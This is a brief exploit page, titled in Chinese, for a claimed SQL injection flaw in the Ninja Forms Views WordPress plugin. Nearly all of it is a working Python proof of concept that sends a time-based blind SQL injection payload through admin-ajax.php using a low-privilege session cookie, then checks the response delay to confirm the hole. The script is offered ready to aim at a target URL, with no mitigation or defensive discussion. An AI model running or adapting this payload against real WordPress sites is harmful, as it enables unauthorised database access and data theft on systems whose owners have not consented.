CVE-2026-42741 Ninja Forms Views插件SQL注入漏洞

import requests # Target configuration target_url = "http://target-wordpress-site.com/wp-admin/admin-ajax.php" # Attacker cookies (low privilege session) cookies = { "wordpress_logged_in_xxx": "low_privilege_session_cookie" } # Payload for Time-Based Blind SQL Injection # Logic: If the database sleeps for 5 seconds, the condition is true. payload_data = { "action": "nf_views_ajax_action", "submission_id": "1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)" } try: print("[+] Sending SQL Injection payload...") response = requests.post(target_url, data=payload_data, cookies=cookies, timeout=10) # Check if the response time indicates success if response.elapsed.total_seconds() >= 5: print("[+] Vulnerability Confirmed: Database responded with delay (Blind SQLi).") else: print("[-] Vulnerability not detected or payload invalid.") except requests.exceptions.RequestException as e: print(f"[!] Error during request: {e}")